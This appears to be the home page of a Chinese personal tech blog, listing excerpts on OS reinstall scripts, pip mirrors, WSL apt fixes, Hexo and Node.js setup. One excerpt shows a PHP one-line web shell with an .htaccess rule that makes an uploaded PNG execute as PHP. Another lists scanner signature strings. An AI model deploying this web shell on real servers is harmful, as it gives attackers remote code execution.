background picture of the home page

小绫华のBlog❤️

最喜欢神里绫华啦!

命令一键重装系统

bin456789/reinstall: 一键DD/重装脚本 (One-click reinstall OS on VPS) (github.com) 亮点 支持安装 17 种常见 Linux 发行版 支持用官方原版 iso 安装 Windows,并且脚本会自动查找 iso 和驱动 支持任意方向重装

thumbnail of the cover of the post

pip一键换源

pip config set global.index-url https://pypi.mirrors.ustc.edu.cn/simple/ pip3 config set global.index-url https://pypi.mirrors.ustc.edu.cn/simple/ 也可以

thumbnail of the cover of the post

解决apt永远卡死

编辑/etc/wsl.conf [boot] systemd=true sudo mv /usr/sbin/telinit /usr/sbin/telinit.bak sudo ln -s /usr/bin/true /usr/sbin/telinit

thumbnail of the cover of the post

常见扫描器

WVS 带有wvs、acunetix_wvs_security_test、acunetix、acunetix_wvs等字样 Nessus 包含nessus字样 APPscan 包含APPscan字样 绿盟极光(Rsas) 包含nsfocus、Rsas字样 sqlmap 包含sqlmap字样 Nets

thumbnail of the cover of the post

php一句话木马

<FilesMatch "1.png"> SetHandler application/x-httpd-php </FilesMatch> 目的是让服务器把1.png当作php代码执行 <?php @eval($_POST['shell']); ?>

thumbnail of the cover of the post

快速搭建个人博客Hexo

操作系统:ubuntu-22.04.4 所需环境:Node.js(不低于8.10,建议10以上),git 环境准备 安装git: apt update -y sudo apt-get install git-core -y 安装Node.js: apt update -y curl

thumbnail of the cover of the post

Nodejs最新版安装

系统:ubuntu-22.04 更新软件源(可选) sudo apt update -y 添加 Nodesource 仓库 curl -fsSL https://deb.nodesource.com/setup_lts.x | sudo -E bash - 安装nodejs最新版 sudo apt

thumbnail of the cover of the post